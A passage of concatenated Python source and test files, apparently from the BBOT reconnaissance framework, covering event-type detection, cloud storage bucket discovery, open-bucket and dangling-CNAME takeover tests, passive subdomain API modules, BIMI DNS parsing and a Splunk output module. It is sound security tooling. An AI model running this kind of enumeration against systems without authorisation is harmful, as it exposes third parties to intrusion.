    Determines the type of event based on the given data.

    Args:
        data (str): The data to be used for determining the event type.

    Returns:
        str: The type of event such as "IP_ADDRESS", "IP_RANGE", or "URL_UNVERIFIED".

    Raises:
        ValidationError: If the event type could not be determined.

    Notes:
        - Utilizes `smart_decode_punycode` and `smart_decode` to preprocess the data.
        - Makes use of `ipaddress` standard library to check for IP and network types.
        - Checks against a set of predefined regular expressions stored in `event_type_regexes`.
    """

    # IP address
    with suppress(Exception):
        ipaddress.ip_address(data)
        return "IP_ADDRESS", data

    # IP network
    with suppress(Exception):
        ipaddress.ip_network(data, strict=False)
        return "IP_RANGE", data

    data = smart_encode_punycode(smart_decode(data).strip())

    # Strict regexes
    for t, regexes in event_type_regexes.items():
        for r in regexes:
            if r.match(data):
                if t == "URL":
                    return "URL_UNVERIFIED", data
                return t, data

    raise ValidationError(f'Unable to autodetect event type from "{data}"')



import sys
from pathlib import Path
from omegaconf import OmegaConf

from ...logger import log_to_stderr
from ...errors import ConfigLoadError


bbot_code_dir = Path(__file__).parent.parent.parent


class BBOTConfigFiles:

    config_dir = (Path.home() / ".config" / "bbot").resolve()
    defaults_filename = (bbot_code_dir / "defaults.yml").resolve()
    config_filename = (config_dir / "bbot.yml").resolve()
    secrets_filename = (config_dir / "secrets.yml").resolve()

    def __init__(self, core):
        self.core = core

    def _get_config(self, filename, name="config"):
        filename = Path(filename).resolve()
        try:
            conf = OmegaConf.load(str(filename))
            cli_silent = any(x in sys.argv for x in ("-s", "--silent"))
            if __name__ == "__main__" and not cli_silent:
                log_to_stderr(f"Loaded {name} from {filename}")
            return conf
        except Exception as e:
            if filename.exists():
                raise ConfigLoadError(f"Error parsing config at {filename}:\n\n{e}")
            return OmegaConf.create()

    def get_custom_config(self):
        return OmegaConf.merge(
            self._get_config(self.config_filename, name="config"),
            self._get_config(self.secrets_filename, name="secrets"),
        )

    def get_default_config(self):
        return self._get_config(self.defaults_filename, name="defaults")



from bbot.modules.base import BaseInterceptModule


class CloudCheck(BaseInterceptModule):
    watched_events = ["*"]
    meta = {"description": "Tag events by cloud provider, identify cloud resources like storage buckets"}
    scope_distance_modifier = 1
    _priority = 3

    async def setup(self):
        self.dummy_modules = None
        return True

    def make_dummy_modules(self):
        self.dummy_modules = {}
        for provider_name, provider in self.helpers.cloud.providers.items():
            module = self.scan._make_dummy_module(f"cloud_{provider_name}", _type="scan")
            module.default_discovery_context = "{module} derived {event.type}: {event.host}"
            self.dummy_modules[provider_name] = module

    async def filter_event(self, event):
        if (not event.host) or (event.type in ("IP_RANGE",)):
            return False, "event does not have host attribute"
        return True

    async def handle_event(self, event, **kwargs):
        # don't hold up the event loop loading cloud IPs etc.
        if self.dummy_modules is None:
            self.make_dummy_modules()
        # cloud tagging by hosts
        hosts_to_check = set(str(s) for s in event.resolved_hosts)
        # we use the original host, since storage buckets hostnames might be collapsed to _wildcard
        hosts_to_check.add(str(event.host_original))
        for host in hosts_to_check:
            for provider, provider_type, subnet in self.helpers.cloudcheck(host):
                if provider:
                    event.add_tag(f"{provider_type}-{provider}")

        found = set()
        # look for cloud assets in hosts, http responses
        # loop through each provider
        for provider in self.helpers.cloud.providers.values():
            provider_name = provider.name.lower()
            base_kwargs = dict(
                parent=event, tags=[f"{provider.provider_type}-{provider_name}"], _provider=provider_name
            )
            # loop through the provider's regex signatures, if any
            for event_type, sigs in provider.signatures.items():
                if event_type != "STORAGE_BUCKET":
                    raise ValueError(f'Unknown cloudcheck event type "{event_type}"')
                base_kwargs["event_type"] = event_type
                for sig in sigs:
                    matches = []
                    if event.type == "HTTP_RESPONSE":
                        matches = await self.helpers.re.findall(sig, event.data.get("body", ""))
                    elif event.type.startswith("DNS_NAME"):
                        for host in hosts_to_check:
                            match = sig.match(host)
                            if match:
                                matches.append(match.groups())
                    for match in matches:
                        if not match in found:
                            found.add(match)

                            _kwargs = dict(base_kwargs)
                            event_type_tag = f"cloud-{event_type}"
                            _kwargs["tags"].append(event_type_tag)
                            if event.type.startswith("DNS_NAME"):
                                event.add_tag(event_type_tag)

                            if event_type == "STORAGE_BUCKET":
                                bucket_name, bucket_domain = match
                                bucket_url = f"https://{bucket_name}.{bucket_domain}"
                                _kwargs["data"] = {
                                    "name": bucket_name,
                                    "url": bucket_url,
                                    "context": f"{{module}} analyzed {event.type} and found {{event.type}}: {bucket_url}",
                                }
                                await self.emit_event(**_kwargs)

    async def emit_event(self, *args, **kwargs):
        provider_name = kwargs.pop("_provider")
        dummy_module = self.dummy_modules[provider_name]
        event = dummy_module.make_event(*args, **kwargs)
        if event:
            await super().emit_event(event)



import os  # noqa
import sys
import pytest
import shutil  # noqa
import asyncio  # noqa
import logging
import subprocess
import tldextract
import pytest_httpserver
from pathlib import Path
from omegaconf import OmegaConf  # noqa

from werkzeug.wrappers import Request

from bbot.errors import *  # noqa: F401
from bbot.core import CORE
from bbot.scanner import Preset
from bbot.core.helpers.async_helpers import get_event_loop
from bbot.core.helpers.misc import mkdir, rand_string, get_python_constraints


log = logging.getLogger(f"bbot.test.fixtures")


bbot_test_dir = Path("/tmp/.bbot_test")
mkdir(bbot_test_dir)


DEFAULT_PRESET = Preset()

available_modules = list(DEFAULT_PRESET.module_loader.configs(type="scan"))
available_output_modules = list(DEFAULT_PRESET.module_loader.configs(type="output"))
available_internal_modules = list(DEFAULT_PRESET.module_loader.configs(type="internal"))


def tempwordlist(content):
    filename = bbot_test_dir / f"{rand_string(8)}"
    with open(filename, "w", errors="ignore") as f:
        for c in content:
            line = f"{c}\n"
            f.write(line)
    return filename


def tempapkfile():
    current_dir = Path(__file__).parent
    with open(current_dir / "owasp_mastg.apk", "rb") as f:
        apk_file = f.read()
    return apk_file


@pytest.fixture
def clean_default_config(monkeypatch):
    clean_config = OmegaConf.merge(
        CORE.files_config.get_default_config(), {"modules": DEFAULT_PRESET.module_loader.configs()}
    )
    with monkeypatch.context() as m:
        m.setattr("bbot.core.core.DEFAULT_CONFIG", clean_config)
        yield


class SubstringRequestMatcher(pytest_httpserver.httpserver.RequestMatcher):
    def match_data(self, request: Request) -> bool:
        if self.data is None:
            return True
        return self.data in request.data


pytest_httpserver.httpserver.RequestMatcher = SubstringRequestMatcher

# silence pytest_httpserver
log = logging.getLogger("werkzeug")
log.setLevel(logging.CRITICAL)

tldextract.extract("www.evilcorp.com")


@pytest.fixture
def bbot_scanner():
    from bbot.scanner import Scanner

    return Scanner


@pytest.fixture
def scan():
    from bbot.scanner import Scanner

    bbot_scan = Scanner("127.0.0.1", modules=["ipneighbor"])
    yield bbot_scan

    loop = get_event_loop()
    loop.run_until_complete(bbot_scan._cleanup())


@pytest.fixture
def helpers(scan):
    return scan.helpers


httpx_response = {
    "timestamp": "2022-11-14T12:14:27.377566416-05:00",
    "hash": {
        "body_md5": "84238dfc8092e5d9c0dac8ef93371a07",
        "body_mmh3": "-1139337416",
        "body_sha256": "ea8fac7c65fb589b0d53560f5251f74f9e9b243478dcb6b3ea79b5e36449c8d9",
        "body_simhash": "9899951357530060719",
        "header_md5": "6e483c85c3b9b96f0e33d84237ca651e",
        "header_mmh3": "-957156428",
        "header_sha256": "5a809d8a53aded843179237365bb6dd069fba75ff8603ac2f6dc6c05d6bf0e76",
        "header_simhash": "15614709017155972941",
    },
    "port": "80",
    "url": "http://example.com:80",
    "input": "http://example.com:80",
    "title": "Example Domain",
    "scheme": "http",
    "webserver": "ECS (agb/A445)",
    "body": '<!doctype html>\n<html>\n<head>\n    <title>Example Domain</title>\n\n    <meta charset="utf-8" />\n    <meta http-equiv="Content-type" content="text/html; charset=utf-8" />\n    <meta name="viewport" content="width=device-width, initial-scale=1" />\n    <style type="text/css">\n    body {\n        background-color: #f0f0f2;\n        margin: 0;\n        padding: 0;\n        font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;\n        \n    }\n    div {\n        width: 600px;\n        margin: 5em auto;\n        padding: 2em;\n        background-color: #fdfdff;\n        border-radius: 0.5em;\n        box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);\n    }\n    a:link, a:visited {\n        color: #38488f;\n        text-decoration: none;\n    }\n    @media (max-width: 700px) {\n        div {\n            margin: 0 auto;\n            width: auto;\n        }\n    }\n    </style>    \n</head>\n\n<body>\n<div>\n    <h1>Example Domain</h1>\n    <p>This domain is for use in illustrative examples in documents. You may use this\n    domain in literature without prior coordination or asking for permission.</p>\n    <p><a href="https://www.iana.org/domains/example">More information...</a></p>\n</div>\n</body>\n</html>\n',
    "content_type": "text/html",
    "method": "GET",
    "host": "93.184.216.34",
    "path": "/",
    "header": {
        "age": "526111",
        "cache_control": "max-age=604800",
        "content_type": "text/html; charset=UTF-8",
        "date": "Mon, 14 Nov 2022 17:14:27 GMT",
        "etag": '"3147526947+ident+gzip"',
        "expires": "Mon, 21 Nov 2022 17:14:27 GMT",
        "last_modified": "Thu, 17 Oct 2019 07:18:26 GMT",
        "server": "ECS (agb/A445)",
        "vary": "Accept-Encoding",
        "x_cache": "HIT",
    },
    "raw_header": 'HTTP/1.1 200 OK\r\nConnection: close\r\nAge: 526111\r\nCache-Control: max-age=604800\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Mon, 14 Nov 2022 17:14:27 GMT\r\nEtag: "3147526947+ident+gzip"\r\nExpires: Mon, 21 Nov 2022 17:14:27 GMT\r\nLast-Modified: Thu, 17 Oct 2019 07:18:26 GMT\r\nServer: ECS (agb/A445)\r\nVary: Accept-Encoding\r\nX-Cache: HIT\r\n\r\n',
    "request": "GET / HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0 (SymbianOS/9.1; U; de) AppleWebKit/413 (KHTML, like Gecko) Safari/413\r\nAccept-Charset: utf-8\r\nAccept-Encoding: gzip\r\n\r\n",
    "time": "112.128324ms",
    "a": ["93.184.216.34", "2606:2800:220:1:248:1893:25c8:1946"],
    "words": 298,
    "lines": 47,
    "status_code": 200,
    "content_length": 1256,
    "failed": False,
}


@pytest.fixture
def events(scan):
    class bbot_events:
        localhost = scan.make_event("127.0.0.1", parent=scan.root_event)
        ipv4 = scan.make_event("8.8.8.8", parent=scan.root_event)
        netv4 = scan.make_event("8.8.8.8/30", parent=scan.root_event)
        ipv6 = scan.make_event("2001:4860:4860::8888", parent=scan.root_event)
        netv6 = scan.make_event("2001:4860:4860::8888/126", parent=scan.root_event)
        domain = scan.make_event("publicAPIs.org", parent=scan.root_event)
        subdomain = scan.make_event("api.publicAPIs.org", parent=scan.root_event)
        email = scan.make_event("bob@evilcorp.co.uk", "EMAIL_ADDRESS", parent=scan.root_event)
        open_port = scan.make_event("api.publicAPIs.org:443", parent=scan.root_event)
        protocol = scan.make_event(
            {"host": "api.publicAPIs.org", "port": 443, "protocol": "HTTP"}, "PROTOCOL", parent=scan.root_event
        )
        ipv4_open_port = scan.make_event("8.8.8.8:443", parent=scan.root_event)
        ipv6_open_port = scan.make_event("[2001:4860:4860::8888]:443", "OPEN_TCP_PORT", parent=scan.root_event)
        url_unverified = scan.make_event("https://api.publicAPIs.org:443/hellofriend", parent=scan.root_event)
        ipv4_url_unverified = scan.make_event("https://8.8.8.8:443/hellofriend", parent=scan.root_event)
        ipv6_url_unverified = scan.make_event("https://[2001:4860:4860::8888]:443/hellofriend", parent=scan.root_event)
        url = scan.make_event(
            "https://api.publicAPIs.org:443/hellofriend", "URL", tags=["status-200"], parent=scan.root_event
        )
        ipv4_url = scan.make_event(
            "https://8.8.8.8:443/hellofriend", "URL", tags=["status-200"], parent=scan.root_event
        )
        ipv6_url = scan.make_event(
            "https://[2001:4860:4860::8888]:443/hellofriend", "URL", tags=["status-200"], parent=scan.root_event
        )
        url_hint = scan.make_event("https://api.publicAPIs.org:443/hello.ash", "URL_HINT", parent=url)
        vulnerability = scan.make_event(
            {"host": "evilcorp.com", "severity": "INFO", "description": "asdf"},
            "VULNERABILITY",
            parent=scan.root_event,
        )
        finding = scan.make_event({"host": "evilcorp.com", "description": "asdf"}, "FINDING", parent=scan.root_event)
        vhost = scan.make_event({"host": "evilcorp.com", "vhost": "www.evilcorp.com"}, "VHOST", parent=scan.root_event)
        http_response = scan.make_event(httpx_response, "HTTP_RESPONSE", parent=scan.root_event)
        storage_bucket = scan.make_event(
            {"name": "storage", "url": "https://storage.blob.core.windows.net"},
            "STORAGE_BUCKET",
            parent=scan.root_event,
        )
        emoji = scan.make_event("💩", "WHERE_IS_YOUR_GOD_NOW", parent=scan.root_event)

    bbot_events.all = [  # noqa: F841
        bbot_events.localhost,
        bbot_events.ipv4,
        bbot_events.netv4,
        bbot_events.ipv6,
        bbot_events.netv6,
        bbot_events.domain,
        bbot_events.subdomain,
        bbot_events.email,
        bbot_events.open_port,
        bbot_events.protocol,
        bbot_events.ipv4_open_port,
        bbot_events.ipv6_open_port,
        bbot_events.url_unverified,
        bbot_events.ipv4_url_unverified,
        bbot_events.ipv6_url_unverified,
        bbot_events.url,
        bbot_events.ipv4_url,
        bbot_events.ipv6_url,
        bbot_events.url_hint,
        bbot_events.vulnerability,
        bbot_events.finding,
        bbot_events.vhost,
        bbot_events.http_response,
        bbot_events.storage_bucket,
        bbot_events.emoji,
    ]

    for e in bbot_events.all:
        e.scope_distance = 0

    return bbot_events


@pytest.fixture(scope="session", autouse=True)
def install_all_python_deps():
    deps_pip = set()
    for module in DEFAULT_PRESET.module_loader.preloaded().values():
        deps_pip.update(set(module.get("deps", {}).get("pip", [])))

    constraint_file = tempwordlist(get_python_constraints())

    subprocess.run([sys.executable, "-m", "pip", "install", "--constraint", constraint_file] + list(deps_pip))



import traceback

from bbot.modules.templates.subdomain_enum import subdomain_enum


class shodan(subdomain_enum):
    options = {"api_key": ""}
    options_desc = {"api_key": "Shodan API key"}

    base_url = "https://api.shodan.io"
    ping_url = f"{base_url}/api-info?key={{api_key}}"

    async def setup(self):
        await super().setup()
        api_keys = set()
        for module_name in ("shodan", "shodan_dns", "shodan_port"):
            module_config = self.scan.config.get("modules", {}).get(module_name, {})
            api_key = module_config.get("api_key", "")
            if isinstance(api_key, str):
                api_key = [api_key]
            for key in api_key:
                key = key.strip()
                if key:
                    api_keys.add(key)
        if not api_keys:
            if self.auth_required:
                return None, "No API key set"
        self.api_key = api_keys
        try:
            await self.ping()
            self.hugesuccess(f"API is ready")
            return True
        except Exception as e:
            self.trace(traceback.format_exc())
            return None, f"Error with API ({str(e).strip()})"



import re

from .base import ModuleTestBase
from bbot.core.helpers.misc import rand_string

__all__ = ["random_bucket_name_1", "random_bucket_name_2", "random_bucket_name_3", "Bucket_Amazon_Base"]

# first one is a normal bucket
random_bucket_name_1 = rand_string(15, digits=False)
# second one is open/vulnerable
random_bucket_name_2 = rand_string(15, digits=False)
# third one is a mutation
random_bucket_name_3 = f"{random_bucket_name_2}-dev"


class Bucket_Amazon_Base(ModuleTestBase):
    targets = ["http://127.0.0.1:8888"]
    provider = "amazon"

    random_bucket_1 = f"{random_bucket_name_1}.s3.amazonaws.com"
    random_bucket_2 = f"{random_bucket_name_2}.s3-ap-southeast-2.amazonaws.com"
    random_bucket_3 = f"{random_bucket_name_3}.s3.amazonaws.com"

    open_bucket_body = """<?xml version="1.0" encoding="UTF-8"?>
    <ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"><Name>vpn-static</Name><Prefix></Prefix><Marker></Marker><MaxKeys>1000</MaxKeys><IsTruncated>false</IsTruncated><Contents><Key>style.css</Key><LastModified>2017-03-18T06:41:59.000Z</LastModified><ETag>&quot;bf9e72bdab09b785f05ff0395023cc35&quot;</ETag><Size>429</Size><StorageClass>STANDARD</StorageClass></Contents></ListBucketResult>"""

    @property
    def config_overrides(self):
        return {"modules": {self.module_name: {"permutations": True}}}

    @property
    def module_name(self):
        return self.__class__.__name__.lower().split("test")[-1]

    @property
    def modules_overrides(self):
        return ["excavate", "speculate", "httpx", self.module_name, "cloudcheck"]

    def url_setup(self):
        self.url_1 = f"https://{self.random_bucket_1}/"
        self.url_2 = f"https://{self.random_bucket_2}/"
        self.url_3 = f"https://{self.random_bucket_3}/"

    def bucket_setup(self):
        self.url_setup()
        self.website_body = f"""
        <a href="{self.url_1}"/>
        <a href="{self.url_2}"/>
        """

    async def setup_after_prep(self, module_test):
        self.bucket_setup()
        # patch mutations
        module_test.scan.helpers.word_cloud.mutations = lambda b, cloud=False: [
            (b, "dev"),
        ]
        module_test.set_expect_requests(
            expect_args={"method": "GET", "uri": "/"}, respond_args={"response_data": self.website_body}
        )
        if module_test.module.supports_open_check:
            module_test.httpx_mock.add_response(
                url=self.url_2,
                text=self.open_bucket_body,
            )
        module_test.httpx_mock.add_response(
            url=self.url_3,
            text="",
        )
        module_test.httpx_mock.add_response(url=re.compile(".*"), text="", status_code=404)

    def check(self, module_test, events):
        # make sure buckets were excavated
        assert any(
            e.type == "STORAGE_BUCKET" and str(e.module) == f"cloud_{self.provider}" for e in events
        ), f'bucket not found for module "{self.module_name}"'
        # make sure open buckets were found
        if module_test.module.supports_open_check:
            assert any(
                e.type == "FINDING" and str(e.module) == self.module_name for e in events
            ), f'open bucket not found for module "{self.module_name}"'
            for e in events:
                if e.type == "FINDING" and str(e.module) == self.module_name:
                    url = e.data.get("url", "")
                    assert self.random_bucket_2 in url
                    assert not self.random_bucket_1 in url
                    assert not self.random_bucket_3 in url
        # make sure bucket mutations were found
        assert any(
            e.type == "STORAGE_BUCKET"
            and str(e.module) == self.module_name
            and f"{random_bucket_name_3}" in e.data["url"]
            for e in events
        ), f'bucket (dev mutation: {self.random_bucket_3}) not found for module "{self.module_name}"'


class TestBucket_Amazon(Bucket_Amazon_Base):
    pass



from .base import ModuleTestBase


class TestLeakIX(ModuleTestBase):
    config_overrides = {"modules": {"leakix": {"api_key": "asdf"}}}

    async def setup_before_prep(self, module_test):
        module_test.httpx_mock.add_response(
            url="https://leakix.net/host/1.1.1.1",
            match_headers={"api-key": "asdf"},
            json={"title": "Not Found", "description": "Host not found"},
        )
        module_test.httpx_mock.add_response(
            url=f"https://leakix.net/api/subdomains/blacklanternsecurity.com",
            match_headers={"api-key": "asdf"},
            json=[
                {
                    "subdomain": "asdf.blacklanternsecurity.com",
                    "distinct_ips": 3,
                    "last_seen": "2023-04-02T09:38:30.02Z",
                },
            ],
        )

    def check(self, module_test, events):
        assert any(e.data == "asdf.blacklanternsecurity.com" for e in events), "Failed to detect subdomain"


class TestLeakIX_NoAPIKey(ModuleTestBase):
    modules_overrides = ["leakix"]

    async def setup_before_prep(self, module_test):
        module_test.httpx_mock.add_response(
            url="https://leakix.net/host/1.1.1.1",
            json={"title": "Not Found", "description": "Host not found"},
        )
        module_test.httpx_mock.add_response(
            url=f"https://leakix.net/api/subdomains/blacklanternsecurity.com",
            json=[
                {
                    "subdomain": "asdf.blacklanternsecurity.com",
                    "distinct_ips": 3,
                    "last_seen": "2023-04-02T09:38:30.02Z",
                },
            ],
        )

    def check(self, module_test, events):
        assert any(e.data == "asdf.blacklanternsecurity.com" for e in events), "Failed to detect subdomain"



# bimi.py
#
# Checks for and parses common BIMI DNS TXT records, e.g. default._bimi.target.domain
#
# Example TXT record: "v=BIMI1; l=https://example.com/brand/logo.svg; a=https://example.com/brand/certificate.pem"
#
# BIMI records may contain a link to an SVG format brand authorised image, which may be useful for:
#  1. Sub-domain or otherwise unknown content hosting locations
#  2. Brand impersonation
#  3. May not be formatted/stripped of metadata correctly leading to some (low value probably) information exposure
#
# BIMI records may also contain a link to a PEM format X.509 VMC certificate, which may be similarly useful.
#
# We simply extract any URL's as URL_UNVERIFIED, no further parsing or download is done by this module in order to remain passive.
#
# The domain portion of any URL's is also passively checked and added as appropriate, for additional inspection by other modules.
#
# Files may be downloaded by other modules which respond to URL_UNVERIFIED events, if you have configured bbot to do so.
#
# NOTE: .svg file extensions are filtered from inclusion by default, modify "url_extension_blacklist" appropriately if you want the .svg image to be considered for download.
#
# NOTE: use the "filedownload" module if you to download .svg and .pem files. .pem will be downloaded by defaut, .svg will require a customised configuration for that module.
#
# The domain portion of any URL_UNVERIFIED's will be extracted by the various internal modules if .svg is not filtered.
#

from bbot.modules.base import BaseModule
from bbot.core.helpers.dns.helpers import service_record

import re

# Handle "v=BIMI1; l=; a=;" == RFC conformant explicit declination to publish, e.g. useful on a sub-domain if you don't want the sub-domain to have a BIMI logo, yet your registered domain does?
# Handle "v=BIMI1; l=; a=" == RFC non-conformant explicit declination to publish
# Handle "v=BIMI1; l=;" == RFC non-conformant explicit declination to publish
# Handle "v=BIMI1; l=" == RFC non-conformant explicit declination to publish
# Handle "v=BIMI1;" == RFC non-conformant explicit declination to publish
# Handle "v=BIMI1" == RFC non-conformant explicit declination to publish
# Handle "v=BIMI1;l=https://bimi.entrust.net/example.com/logo.svg;"
# Handle "v=BIMI1; l=https://bimi.entrust.net/example.com/logo.svg;"
# Handle "v=BIMI1;l=https://bimi.entrust.net/example.com/logo.svg;a=https://bimi.entrust.net/example.com/certchain.pem"
# Handle "v=BIMI1; l=https://bimi.entrust.net/example.com/logo.svg;a=https://bimi.entrust.net/example.com/certchain.pem;"
_bimi_regex = r"^v=(?P<v>BIMI1);* *(l=(?P<l>https*://[^;]*|)|);*( *a=((?P<a>https://[^;]*|)|);*)*$"
bimi_regex = re.compile(_bimi_regex, re.I)


class dnsbimi(BaseModule):
    watched_events = ["DNS_NAME"]
    produced_events = ["URL_UNVERIFIED", "RAW_DNS_RECORD"]
    flags = ["subdomain-enum", "cloud-enum", "passive", "safe"]
    meta = {
        "description": "Check DNS_NAME's for BIMI records to find image and certificate hosting URL's",
        "author": "@colin-stubbs",
        "created_date": "2024-11-15",
    }
    options = {
        "emit_raw_dns_records": False,
        "emit_urls": True,
        "selectors": "default,email,mail,bimi",
    }
    options_desc = {
        "emit_raw_dns_records": "Emit RAW_DNS_RECORD events",
        "emit_urls": "Emit URL_UNVERIFIED events",
        "selectors": "CSV list of BIMI selectors to check",
    }

    async def setup(self):
        self.emit_raw_dns_records = self.config.get("emit_raw_dns_records", False)
        self.emit_urls = self.config.get("emit_urls", True)
        self._selectors = self.config.get("selectors", "").replace(", ", ",").split(",")

        return await super().setup()

    def _incoming_dedup_hash(self, event):
        # dedupe by parent
        parent_domain = self.helpers.parent_domain(event.data)
        return hash(parent_domain), "already processed parent domain"

    async def filter_event(self, event):
        if "_wildcard" in str(event.host).split("."):
            return False, "event is wildcard"

        # there's no value in inspecting service records
        if service_record(event.host) == True:
            return False, "service record detected"

        return True

    async def inspectBIMI(self, event, domain):
        parent_domain = self.helpers.parent_domain(event.data)
        rdtype = "TXT"

        for selector in self._selectors:
            tags = ["bimi-record", f"bimi-{selector}"]
            hostname = f"{selector}._bimi.{parent_domain}"

            r = await self.helpers.resolve_raw(hostname, type=rdtype)

            if r:
                raw_results, errors = r

                for answer in raw_results:
                    if self.emit_raw_dns_records:
                        await self.emit_event(
                            {
                                "host": hostname,
                                "type": rdtype,
                                "answer": answer.to_text(),
                            },
                            "RAW_DNS_RECORD",
                            parent=event,
                            tags=tags.append(f"{rdtype.lower()}-record"),
                            context=f"{rdtype} lookup on {hostname} produced {{event.type}}",
                        )

                    # we need to strip surrounding quotes and whitespace, as well as fix TXT data that may have been split across two different rdata's
                    # e.g. we will get a single string, but within that string we may have two parts such as:
                    # answer = '"part 1 that was really long" "part 2 that did not fit in part 1"'
                    s = answer.to_text().strip('"').strip().replace('" "', "")

                    bimi_match = bimi_regex.search(s)

                    if bimi_match and bimi_match.group("v") and "bimi" in bimi_match.group("v").lower():
                        if bimi_match.group("l") and bimi_match.group("l") != "":
                            if self.emit_urls:
                                await self.emit_event(
                                    bimi_match.group("l"),
                                    "URL_UNVERIFIED",
                                    parent=event,
                                    tags=tags.append("bimi-location"),
                                )

                        if bimi_match.group("a") and bimi_match.group("a") != "":
                            if self.emit_urls:
                                await self.emit_event(
                                    bimi_match.group("a"),
                                    "URL_UNVERIFIED",
                                    parent=event,
                                    tags=tags.append("bimi-authority"),
                                )

    async def handle_event(self, event):
        await self.inspectBIMI(event, event.host)


# EOF



from .base import ModuleTestBase


class TestBufferOverrun(ModuleTestBase):
    config_overrides = {"modules": {"bufferoverrun": {"api_key": "asdf", "commercial": False}}}

    async def setup_before_prep(self, module_test):
        # Mock response for non-commercial API
        module_test.httpx_mock.add_response(
            url="https://tls.bufferover.run/dns?q=.blacklanternsecurity.com",
            match_headers={"x-api-key": "asdf"},
            json={"Results": ["1.2.3.4,example.com,*,*,sub.blacklanternsecurity.com"]},
        )

    def check(self, module_test, events):
        assert any(e.data == "sub.blacklanternsecurity.com" for e in events), "Failed to detect subdomain for free API"


class TestBufferOverrunCommercial(ModuleTestBase):
    modules_overrides = ["bufferoverrun"]
    module_name = "bufferoverrun"
    config_overrides = {"modules": {"bufferoverrun": {"api_key": "asdf", "commercial": True}}}

    async def setup_before_prep(self, module_test):
        # Mock response for commercial API
        module_test.httpx_mock.add_response(
            url="https://bufferover-run-tls.p.rapidapi.com/ipv4/dns?q=.blacklanternsecurity.com",
            match_headers={"x-rapidapi-host": "bufferover-run-tls.p.rapidapi.com", "x-rapidapi-key": "asdf"},
            json={"Results": ["5.6.7.8,blacklanternsecurity.com,*,*,sub.blacklanternsecurity.com"]},
        )

    def check(self, module_test, events):
        assert any(
            e.data == "sub.blacklanternsecurity.com" for e in events
        ), "Failed to detect subdomain for commercial API"



from .base import ModuleTestBase


class BaseTestBaddns(ModuleTestBase):
    modules_overrides = ["baddns"]
    targets = ["bad.dns"]
    config_overrides = {"dns": {"minimal": False}}

    async def dispatchWHOIS(x):
        return None

    def select_modules(self):
        from baddns.base import get_all_modules

        selected_modules = []
        for m in get_all_modules():
            if m.name in ["CNAME"]:
                selected_modules.append(m)
        return selected_modules


class TestBaddns_cname_nxdomain(BaseTestBaddns):
    async def setup_after_prep(self, module_test):
        from bbot.modules import baddns as baddns_module
        from baddns.lib.whoismanager import WhoisManager

        await module_test.mock_dns(
            {"bad.dns": {"CNAME": ["baddns.azurewebsites.net."]}, "_NXDOMAIN": ["baddns.azurewebsites.net"]}
        )
        module_test.monkeypatch.setattr(baddns_module.baddns, "select_modules", self.select_modules)
        module_test.monkeypatch.setattr(WhoisManager, "dispatchWHOIS", self.dispatchWHOIS)

    def check(self, module_test, events):
        assert any([e.data == "baddns.azurewebsites.net" for e in events]), "CNAME detection failed"
        assert any([e.type == "VULNERABILITY" for e in events]), "Failed to emit VULNERABILITY"
        assert any(["baddns-cname" in e.tags for e in events]), "Failed to add baddns tag"


class TestBaddns_cname_signature(BaseTestBaddns):
    targets = ["bad.dns:8888"]
    modules_overrides = ["baddns", "speculate"]

    async def setup_after_prep(self, module_test):
        from bbot.modules import baddns as baddns_module
        from baddns.base import BadDNS_base
        from baddns.lib.whoismanager import WhoisManager

        def set_target(self, target):
            return "127.0.0.1:8888"

        expect_args = {"method": "GET", "uri": "/"}
        respond_args = {"response_data": "<h1>Oops! We couldn&#8217;t find that page.</h1>", "status": 200}
        module_test.set_expect_requests(expect_args=expect_args, respond_args=respond_args)

        await module_test.mock_dns(
            {"bad.dns": {"CNAME": ["baddns.bigcartel.com."]}, "baddns.bigcartel.com": {"A": ["127.0.0.1"]}}
        )
        module_test.monkeypatch.setattr(baddns_module.baddns, "select_modules", self.select_modules)
        module_test.monkeypatch.setattr(BadDNS_base, "set_target", set_target)
        module_test.monkeypatch.setattr(WhoisManager, "dispatchWHOIS", self.dispatchWHOIS)

    def check(self, module_test, events):
        assert any([e for e in events])
        assert any(
            [e.type == "VULNERABILITY" and "bigcartel.com" in e.data["description"] for e in events]
        ), "Failed to emit VULNERABILITY"
        assert any(["baddns-cname" in e.tags for e in events]), "Failed to add baddns tag"



from bbot.errors import WebError
from bbot.modules.output.base import BaseOutputModule


class Splunk(BaseOutputModule):
    watched_events = ["*"]
    meta = {
        "description": "Send every event to a splunk instance through HTTP Event Collector",
        "created_date": "2024-02-17",
        "author": "@w0Tx",
    }
    options = {
        "url": "",
        "hectoken": "",
        "index": "",
        "source": "",
        "timeout": 10,
    }
    options_desc = {
        "url": "Web URL",
        "hectoken": "HEC Token",
        "index": "Index to send data to",
        "source": "Source path to be added to the metadata",
        "timeout": "HTTP timeout",
    }

    async def setup(self):
        self.url = self.config.get("url", "")
        self.source = self.config.get("source", "bbot")
        self.index = self.config.get("index", "main")
        self.timeout = self.config.get("timeout", 10)
        self.headers = {}

        hectoken = self.config.get("hectoken", "")
        if hectoken:
            self.headers["Authorization"] = f"Splunk {hectoken}"
        if not self.url:
            return False, "Must set URL"
        if not self.source:
            self.warning("Please provide a source")
        return True

    async def handle_event(self, event):
        while 1:
            try:
                data = {
                    "index": self.index,
                    "source": self.source,
                    "sourcetype": "_json",
                    "event": event.json(),
                }
                await self.helpers.request(
                    url=self.url,
                    method="POST",
                    headers=self.headers,
                    json=data,
                    raise_error=True,
                )
                break
            except WebError as e:
                self.warning(f"Error sending {event}: {e}, retrying...")
                await self.helpers.sleep(1)



import regex as re
from collections import OrderedDict

# for extracting words from strings
word_regexes = [
    re.compile(r, re.I)
    for r in [
        # alpha
        r"[a-z]{3,}",
        # alphanum
        r"[a-z0-9]{3,}",
        # alpha, dash
        r"[a-z][a-z-]+[a-z]",
        # alpha, underscore
        r"[a-z][a-z_]+[a-z]",
    ]
]

word_regex = re.compile(r"[^\d\W_]+")
word_num_regex = re.compile(r"[^\W_]+")
num_regex = re.compile(r"\d+")

_ipv4_regex = r"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)(?:\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){3}"
ipv4_regex = re.compile(_ipv4_regex, re.I)

# IPv6 is complicated, so we have accomodate alternative patterns,
# :(:[A-F0-9]{1,4}){1,7} == ::1, ::ffff:1
